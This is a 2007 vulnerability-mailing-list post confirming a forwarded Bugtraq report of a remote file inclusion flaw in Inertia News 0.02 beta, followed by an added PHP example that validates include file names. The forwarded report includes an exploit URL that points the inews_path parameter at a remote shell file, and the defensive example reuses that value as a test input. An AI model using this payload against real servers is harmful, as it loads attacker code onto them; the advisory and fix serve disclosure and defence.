[VIM] true: Inertia News Remote File İnclude

Noam Rathaus noamr at beyondsecurity.com
Tue Feb 13 05:08:48 EST 2007


Hi,

It looks legit:

<snip>
require ("$inews_path/inertia_sql_class.php");
</snip>

No tests done to the value.

Product looks like abandonware (http://www.brentc.com/inertianews/).

----------  Forwarded Message  ----------

Subject: Inertia News Remote File İnclude
Date: Monday 12 February 2007 22:55
From: crazy_king at eno7.org
To: bugtraq at securityfocus.com

Version :
0.02 beta

Error :
require ("$inews_path/inertia_sql_class.php");

Exploit :
 http://www.victim.com/inertianews_main.php?inews_path=http://www.site.com/shell.txt

Eno7.Org - Crazy-King.ORg

Thanks : Apaci & Erne & Eno7 & Tamturk & UyussMan & Ayyıldız Tim

-------------------------------------------------------

-- 
  Noam Rathaus
  CTO
  1616 Anderson Rd.
  McLean, VA 22102
  Tel: 703.286.7725 extension 105
  Fax: 888.667.7740
  noamr at beyondsecurity.com
  http://www.beyondsecurity.com
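
The check that the message above reports as missing ("No tests done to the value"), shown as an added PHP example that is not part of the original thread and not Inertia News code: the include directory is fixed in code, and the file name is validated and resolved before `require`. `inews_resolve()` and the temporary demo directory are hypothetical.

```php
<?php
// Added example, not Inertia News code. inews_resolve() is a hypothetical helper.
// Vulnerable form from the post: require ("$inews_path/inertia_sql_class.php");

function inews_resolve(string $file, string $base): string
{
    // Accept plain file names only: no scheme, no separators, no "..".
    if (!preg_match('/\A[A-Za-z0-9_]+\.php\z/', $file)) {
        throw new InvalidArgumentException("rejected include name: $file");
    }
    $root = realpath($base);
    $path = realpath($base . DIRECTORY_SEPARATOR . $file);
    // realpath() returns false for a missing file; the prefix check
    // catches symlinks that resolve outside the base directory.
    if ($root === false || $path === false
        || strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        throw new RuntimeException("not inside include directory: $file");
    }
    return $path;
}

// Constructed demo: a temporary directory stands in for the install directory.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'inews_demo_' . getmypid();
mkdir($base);
file_put_contents($base . DIRECTORY_SEPARATOR . 'inertia_sql_class.php', "<?php // stub\n");

$samples = [
    'inertia_sql_class.php',          // the intended file
    'http://www.site.com/shell.txt',  // value from the forwarded report
    '../inertia_sql_class.php',       // traversal attempt
];
foreach ($samples as $name) {
    try {
        echo $name, ' => ', inews_resolve($name, $base), PHP_EOL;
    } catch (Exception $e) {
        echo $name, ' => ', $e->getMessage(), PHP_EOL;
    }
}

// In the application the base is a constant set in code, never request data:
//   require inews_resolve('inertia_sql_class.php', __DIR__);

unlink($base . DIRECTORY_SEPARATOR . 'inertia_sql_class.php');
rmdir($base);
```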

